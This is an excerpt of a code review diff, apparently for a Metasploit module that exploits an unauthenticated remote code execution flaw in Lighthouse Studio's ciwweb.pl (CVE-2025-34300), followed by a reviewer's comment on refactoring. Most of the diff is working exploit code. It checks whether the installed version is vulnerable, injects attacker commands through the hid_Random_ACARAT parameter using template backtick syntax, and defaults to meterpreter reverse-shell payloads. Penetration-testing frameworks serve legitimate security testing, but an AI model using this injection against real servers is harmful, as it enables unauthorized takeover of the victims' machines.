modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb

```diff
@@ -0,0 +1,177 @@
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_CMD],
+              'Type' => :windows_command,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-07-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']),
+        OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']),
+        OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\'])
+      ]
+    )
+  end
+
+  def check
+    print_status('Extracting version...')
+
+    vars = {
+      'hid_javascript' => '1'
+    }
+    vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].strip.empty?
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'vars_get' => vars
+    )
+    return CheckCode::Unknown('No response from target') unless res
+
+    if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/
+      version_match = Regexp.last_match(1).to_s
+      version = Rex::Version.new(version_match.gsub('_', '.'))
+      print_status("Extracted version: #{version}")
+
+      return CheckCode::Appears if version < Rex::Version.new('9.16.14')
+    else
+      print_error("#{peer} - Unable to extract version number")
+    end
+
+    html = res.get_html_document
+    if html&.text&.include?('Lighthouse Studio')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd = Rex::Text.uri_encode(cmd).gsub('\\', '%5C').gsub('/', '%2F')
+
+    query = [
+      'hid_javascript=1',
+      "hid_Random_ACARAT=[%`#{cmd}`%]",
+      "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
+    ]
+
+    query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty?
+    query_string = query.join('&')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'query' => query_string
+    })
+
+    if res
+      html = res.get_html_document
+      if html&.text&.include?('Cannot find default studyname')
+        fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
+      end
+    end
+  end
+
+  def exploit
+    print_status('Uploading malicious payload...')
+
+    case target['Type']
```

Comment:
When using fetch payloads you shouldn't need this case statement or have to call `execute_cmdstager` vs `execute_command`. 

All the code in `execute_command` can either be moved into the exploit method, or you can rename it to something like `execute_payload` and call it from `exploit`